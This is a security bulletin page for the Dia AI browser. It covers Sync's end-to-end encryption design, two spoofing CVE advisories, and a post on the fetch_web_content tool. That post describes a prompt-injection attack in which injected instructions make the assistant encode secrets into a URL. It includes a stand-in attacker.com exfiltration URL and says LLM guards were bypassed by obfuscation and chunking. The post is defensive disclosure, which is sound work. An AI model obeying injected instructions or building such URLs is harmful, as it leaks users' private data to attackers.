Our latest updates on Security

Welcome to our Dia Security Bulletin. Here you’ll find the most up to date information on recent security fixes and security news for Dia. We get into the weeds a little here, if you have any questions you can always find us on security@thebrowser.company.

April 29, 2026

How Dia Sync keeps your data safe by design

On Thursday, April 9, 2026, we launched a much-anticipated feature in Dia: Sync. Here's how we shipped this feature securely.

TL;DR

Sync lets you access your bookmarks, tabs, and profiles (with more to come!) across multiple devices. Your sync data is end-to-end encrypted before it ever leaves your device — we can't read it, even though we store it on your behalf. This post walks through how we generate and protect your encryption keys, how we transfer them between devices without exposing them to our servers, and the design principle at the center of all of it: assume our servers are compromised, and ensure they still can't access your data.

If you haven't tried Sync yet, here's how to get started.

Our design principle: assume compromise, design for containment

Before getting into the technical details, it's worth explaining the mental model we used when designing Sync's security.

We asked ourselves a simple question: if our own servers were compromised and fully controlled by an attacker... could they access your synced data?

The answer had to be "no."

Every design decision in Sync flows from that constraint. The encryption happens on your device. The keys stay on your devices. The server stores ciphertext it cannot decrypt. When we needed to transfer keys between devices, we designed the transfer so that even a compromised server sitting in the middle can't extract the key.

This is the same philosophy we applied to fetch_web_content and other Dia capabilities. Don't just try to prevent bad outcomes. Design so they're structurally infeasible.

Your encryption key

When you enable Sync, Dia generates a random 256-bit encryption seed on your device. We call this your sync key. It's the root of all Sync encryption, and never leaves your devices.

From that seed, we use HKDF-SHA256 to derive two keys:

  1. A 256-bit AES key - this is the encryption key. Before any sync data leaves your device, it's encrypted with this key via AES-256-GCM. Our servers only ever receive ciphertext they cannot decrypt.
  2. An Ed25519 keypair - this is the authentication key. The server uses the public half to verify that sync operations are coming from a device that holds your sync key. Even if your Dia account is compromised, your synced data can’t be accessed or modified without one of your syncing devices.

Before any data is sent to Dia's servers, it's encrypted with your encryption key via AES-256-GCM. Both keys are derived from your sync key, and neither the sync key nor its derived keys are ever shared with our servers. Only your devices have the capacity to decrypt or modify your synced data.

We also use the BIP39 protocol to convert your sync key into a 24-word recovery phrase. This gives you a human-readable backup of your key that's much easier to type than the raw key itself.

Adding new devices is the hard part

Encrypting data is the straightforward piece. The challenge is: how do you get your sync key onto a new device without exposing it to our servers?

Existing approaches all have tradeoffs for a desktop browser:

  • QR Codes - Encrypted messengers like Signal use this: show a QR code on one device, scan it with the other. But Dia runs on laptops and desktops. Holding one laptop screen up to another is awkward, and desktops don't always have a camera. QR transfers work best with a phone.
  • Passwords - Services like iCloud and password managers let you pick a password that derives the encryption key, but you already have a Dia password. Enterprises often use SSO without a password at all. We didn't want to introduce a second password just for Sync.
  • Recovery phrases - Many services use these as a backup (Sync included), but they're cumbersome as a primary transfer method.

All three approaches transfer the key out of band, without touching the server. We started looking for a way to transfer keys through our server, between your devices, in a manner where our server could not eavesdrop. In other words: secure key transfer over an untrusted channel.

The solution: SPAKE key exchange

We landed on Symmetric Password-Authenticated Key Exchange (SPAKE), facilitated by our server, to pass the sync key between two devices in your account.

SPAKE is a special kind of key exchange. Like standard Elliptic Curve Diffie-Hellman, two parties exchange information across a server to compute a shared secret. But in SPAKE, the initial handshake itself is encrypted with a password both parties know beforehand. This means that any party in between (here, Dia's servers) would have to guess the password before they could attempt to insert themselves into the key exchange.

Here's how it works in practice:

When you add a new device, your existing device displays a device transfer code - a short alphanumeric code you type into your new device. This is the SPAKE password. You pass it between devices yourself; the server never sees it.

If a compromised server wanted to perform a man-in-the-middle attack, it would have to guess this code. But here's the critical detail: only your devices can validate whether a guess is correct. The server has to send its guesses to the client, and we've configured Dia to allow only three wrong attempts before the code is rotated. Since sync codes are 6 characters drawn from digits and uppercase letters, that's roughly 3 chances in 2 billion.

Once the transfer completes, the code is discarded and never reused.

Your data, your control

You can disable Sync at any time. And when you do, your encrypted data is permanently deleted from our servers. No retention period, no archival copy. It's gone.

If you delete your Dia account entirely, all associated data (including sync data) is deleted from our servers within 30 days.

Our broader design principle

With Sync, we're not just guaranteeing "we don't read your data." We can't read your data, by design. A compromised server can refuse to sync your data (a denial-of-service), but it cannot read it, cannot modify it undetected, and cannot intercept your keys during device transfer.

This is the approach we take across all of Dia's security architecture: assume compromise, design for containment. We don't rely on our servers staying safe. We build so that even if they don't, your data does.

Sync's encryption, key exchange, and server components were independently assessed by a third-party security firm before launch.

For more on how Dia handles your data, see our Privacy page and Security FAQ.

February 12, 2026

Security Story of fetch_web_content

How we built a powerful feature, discovered it could be exploited, and rebuilt it from the ground up with security at its core.

TL;DR

This post tells the story of fetch_web_content, a tool that lets Dia retrieve information from the web on your behalf. We built it, discovered it could be exploited for data exfiltration via prompt injection, spent months trying to secure it with detection-based approaches, and ultimately concluded that detection wasn't enough. We made the difficult decision to remove the feature before Dia's public beta in June 2025. Two months later, we brought it back—rebuilt from the ground up with architectural controls that remain secure even when prompt injection occurs.

This is a story about what it looks like to take AI security seriously: acknowledging when something isn't working, having the discipline to unship, and investing in solutions that address root causes rather than symptoms. It's also just one example—Dia's security architecture includes many layers of protection, each designed to address different threat vectors. This post is a deep dive into one of them.

What is fetch_web_content?

fetch_web_content is one of Dia's most versatile tools. It allows the assistant to retrieve information from URLs—pulling in web pages, documentation, articles, and other online resources to provide richer, more informed responses.

When a user asks Dia to summarize a link, check the status of a service, or pull in context from the web, fetch_web_content makes that possible. It's the kind of capability that transforms an AI assistant from a static knowledge base into a dynamic, connected helper.

We were excited to ship it. It was one of the first tools we built—present in Dia's earliest internal builds back in January 2025.

Then we broke it.

The Discovery: Data Exfiltration via URL Encoding

During security testing, our team uncovered a serious vulnerability class. The attack vector was elegant in its simplicity and terrifying in its implications.

Here's how it works:

URLs can encode arbitrary data. A URL like https://attacker.com/log?data=secret123 transmits secret123 to attacker.com when fetched.

LLMs are eager to follow instructions. If an attacker can inject malicious instructions into content the model processes (via prompt injection), they can instruct the model to:

  1. Extract sensitive information from the user's context
  2. Encode that data into a URL parameter
  3. Call fetch_web_content on that URL

The fetch itself becomes the exfiltration. The moment Dia makes that request, the sensitive data—passwords, API keys, private conversations, whatever was in context—gets transmitted to the attacker's server in the request logs.

No fancy exploits. No zero-days. Just the normal, intended behavior of a URL fetch, exploited through prompt injection.

The Attempt: Can We Detect and Block This?

Once we understood the shape of the attack, our first instinct was straightforward: keep the feature, but get really good at spotting the bad cases.

That led us down the detection path. We tried a bunch of variants of the same basic idea: let the model decide what to fetch, then add checks to catch exfiltration before the request goes out.

Here’s what we tested through the first half of 2025:

  • URL allowlisting and blocklisting — This sounds reasonable until you remember how cheap domains are. Attackers can register new domains instantly, and even legitimate sites can be turned into collection endpoints.
  • Pattern detection for sensitive data in URLs — We looked for things that “seem like secrets” (tokens, keys, long base64-ish blobs, etc.). The false positive rate was brutal, because real-world URLs are full of encoded parameters. And in the cases that mattered most, attackers could just transform or split the data until it no longer matched.
  • Heuristic analysis of URL structure — We tried scoring requests based on URL shape: parameter length, entropy, suspicious parameter names, unusual encoding patterns, and so on. This helped catch the obvious stuff, but sophisticated attackers would have no trouble producing URLs that looked completely normal.
  • Output filtering — Another thought was “even if the model tries to exfiltrate, we’ll catch it on the way out.” But the model can obfuscate data before encoding it, or distribute it across multiple innocuous-looking requests.
  • Prompt-based guardrails — We also tried the standard "tell the model not to do that" approach. The problem is prompt injection is the attack. If your defense relies on the model consistently ignoring malicious instructions, you're betting against the one thing the attacker is best positioned to influence.

We also explored a natural escalation of these ideas: using LLMs themselves as part of the defense—either to review the page context for signs of prompt injection, or to inspect the generated URL and decide whether it looked like exfiltration.

On paper, this is appealing. Models can reason about intent, generalize beyond fixed patterns, and catch things that would slip past regex and heuristics.

In practice, it didn’t change the outcome. Our team was able to bypass every LLM-based detection mechanism we tried—regardless of model size—using the same playbook attackers use everywhere else: obfuscation, indirection, chunking, encoding, and “make it look normal” transformations. Even when the guard model flagged attacks sometimes, it wasn’t consistent enough to be a security boundary we could actually rely on.

We kept circling back to the same uncomfortable conclusion: we were trying to tell the difference between a legitimate fetch and a malicious fetch after the model had already decided to make the request—and the adversary could shape both the content and the model’s behavior.

Detection-based security is not sufficient when the attacker controls the input to your detector and can influence the detector's ruleset.

What About Asking the User?

There's one mitigation we haven't mentioned yet: human-in-the-loop confirmation. What if we just asked the user before fetching each URL?

This sounds reasonable. It's a pattern users have seen before—banks, social networks, and other sites show similar prompts when you click an external link. But we concluded that humans couldn't effectively be in the loop here, for several reasons:

The risk profile is completely different. Those familiar prompts warn you that you're leaving a trusted site—not that your data might be stolen immediately by proceeding. When a bank shows "You are now leaving Example Bank," the worst case is usually landing on a phishing page you can recognize and close. Our prompt would need to communicate something much more severe: "If you approve this, sensitive data from your context could be transmitted to an attacker." Users aren't trained to think about URL fetches this way, and we couldn't expect them to understand how novel this situation is.

It's a terrible user experience. Dia often fetches multiple URLs to answer a single question—pulling in documentation, checking references, gathering context. Prompting for each fetch would be exhausting and would undermine the core value of having an AI assistant that can work with the web on your behalf.

Even "allowlist this domain" doesn't work. You might think users could approve trusted domains once and be done with it. But most major domains have open redirects—URL endpoints that will redirect to any destination. Allowlist youtube.com, and an attacker can use YouTube's well-known open redirect to bounce data to their own server. The allowlist becomes a bypass, not a protection.

In this situation: we couldn't make users the security boundary. The solution had to be architectural.

The Decision: Unlaunch

By June 2025, we were preparing to launch Dia's public beta. We had a decision to make.

This wasn't a close call. We had a feature that could be exploited to exfiltrate user data, and we couldn't reliably prevent it.

We unlaunched fetch_web_content. It didn't ship with the beta.

Shipping fast matters. Shipping secure matters more.

The Rebuild: Secure by Design

We went back to first principles. Instead of asking "how do we detect malicious fetches?" we asked "how do we make this class of malicious fetches impossible in practice?"

The answer required rethinking the feature's architecture entirely:

URL Provenance

By design, fetch_web_content enforces provenance—a clear chain of custody showing where a URL came from. URLs that appear in the user's browsing context, their tabs, their messages? Those have provenance. URLs the model generates from whole cloth, potentially stuffed with exfiltrated data? Those don't.

If a URL can't demonstrate where it came from, fetch_web_content is designed to reject it.

URLs with provenance (allowed):

  • A link the user clicks or pastes—"Summarize this article" with a URL from their clipboard or an open tab
  • A link visible in the user's browsing context—a URL from a webpage they're actively viewing
  • A link from a message or email—a URL that appeared in a Slack message, email, or chat the user shared with Dia
  • A link from a document the user opened—a URL embedded in a PDF, Google Doc, or Notion page the user explicitly gave Dia access to

URLs without provenance (blocked):

Provenance isn't about whether a URL looks safe—it's about whether we can trace it back to something the user actually provided or intended to access. The model can choose which URLs to fetch, but provenance enforcement dramatically narrows the set of URLs it can access to those rooted in the user's context.

Assume Prompt Injection Will Happen

This is the key mental shift. We stopped designing for a world where we successfully block all prompt injection. We started designing for a world where prompt injection happen, and the attacker can’t get the results they want.

When an attacker injects malicious instructions, Dia might follow them. It might even try to construct a malicious URL. But when it calls fetch_web_content, the URL is checked against its provenance policy. Attacker-constructed URLs are rejected before data leaves the device.

Defense in Depth

URL provenance is our primary control, but it's not our only one. We've layered additional safeguards throughout the system. The details are less important than the principle: no single control failing should compromise user security.

The Result

A couple of months later, fetch_web_content came back. It's just as useful as before—users can ask Dia to pull in web content, summarize articles, and work with online resources.

But now, even if an attacker achieves prompt injection, this attack vector is effectively closed off.

To be clear: this doesn't mean fetch_web_content is immune to all misuse, or that prompt injection is "solved." Other attack patterns require other defenses. What we've done is architecturally close off this specific threat—data exfiltration via URL encoding—so that even a successful prompt injection can't exploit it.

Why This Matters

The security community has been sounding the alarm on prompt injection for years. And they're right—it's a hard problem without a clean solution. You can't consistently and robustly detect all prompt injections, which means you can't fully trust model outputs.

But you can design systems that limit blast radius even when prompt injection succeeds.

This is the path forward for AI security: assume compromise, design for containment.

fetch_web_content is one tool, and URL provenance is one control. Dia's broader security posture includes many other systems—each with its own story of iteration, testing, and refinement. We'll share more of those stories over time.

Join Us

Building AI agents that can safely interact with the real world is still a frontier problem. The attacks are evolving, the tooling is immature, and the cost of getting it wrong is real user harm.

That’s why our Trust and Safety team is growing. If you’re excited about AI security—agent containment, prompt injection defense, tool safety, sandboxing, provenance, and defense-in-depth—and you want to help build Dia’s AI capabilities the right way, we’d love to talk.

We’re hiring.

January 15, 2026

CVE-2025-15032: Increased Spoofing risk; custom new window missing about:blank

  • Summary: Increased spoofing risk in affected macOS versions of Dia.
  • CVE ID: CVE-2025-15032
  • Advisory Release Date: Fri, Jan 16, 2026
  • Affected Version: Dia version <1.9.0
  • Severity: High

Details

With this issue, an attacker-controlled site could potentially open a new custom-sized window where the URL bar did not display about:blank — this could allow an attacker to make a window’s title appear like a trusted domain and potentially mislead users about what site they were on.

In Dia versions ≥1.9.0, about:blank is displayed in the URL bar in these scenarios, which makes spoof attempts more visible.

Severity

The Browser Company rates this issue High with a CVSS v3.1 base score of 7.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N). This reflects our internal assessment—please evaluate applicability within your environment.

Affected Versions

Dia on MacOS Version <1.9.0

What do I need to do?

Update Dia to the latest available version. Any version 1.9.1 or newer contains the fix.

Credit

The Browser Company thanks frozzipies and novemberelang for reporting this issue through our vulnerability rewards program.

November 20, 2025

CVE-2025-13132: Increased Spoof Risk; Missing full screen toast

  • Summary: Increased Spoof Risk in affected MacOS versions of Dia
  • CVE ID: CVE-2025-13132
  • Advisory Release Date: Fri, Nov 21, 2025
  • Affected Versions: Dia versions <1.6
  • Severity: High

Details

This vulnerability allowed a site to enter fullscreen without a full-screen notification (toast) appearing. Without this notification, users could potentially be misled about what site they were on if a malicious site renders a fake UI (like a fake address bar.)

In Dia versions ≥1.6, the fullscreen notification (toast) is now enabled in all scenarios, informing users in a transition to fullscreen and making spoof attempts visible.

Severity

The Browser Company rates this issue High with a CVSS v3.1 base score of 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N). This reflects our internal assessment—please evaluate applicability within your environment.

Affected Versions

Dia on MacOS versions <1.6

What do I need to do?

Update Dia to the latest available version. Any version 1.6 or newer contains the fix.

Credit

The Browser Company thanks @frozzipies for reporting this issue through our vulnerability rewards program.

October 15, 2025

Introducing Dia’s Security Bulletin

Hi there, Cory here! I’m the Head of Security at The Browser Company. With the general availability of Dia being announced, the security team is introducing Dia’s Security Bulletin page.

Security has been at the core of how we built Dia. Being an AI Browser introduces novel security considerations—from prompt injection and model supply chain risks to client hardening and safe integrations. We’re committed to transparent, actionable communication when there’s something users or admins need to do.

This page will host:

  • Advisories: Clear guidance on vulnerabilities affecting Dia and steps to remediate.
  • CVE Notices: Disclosures aligned with our CNA policy and assignment process.
  • Security-impacting Release Notes: Highlights of patches, mitigations, and hardening work.
  • Enterprise Updates: Admin controls, policy changes, and audit-related information.

Publishing cadence will be event-driven: when there’s user- or admin-action to take, you’ll see it here first, with severity, affected versions, and fix paths.

If you believe you’ve found a security issue, please report it through our bug bounty program or responsible disclosure channels listed on the Dia Security Center. Thank you for helping us keep users safe.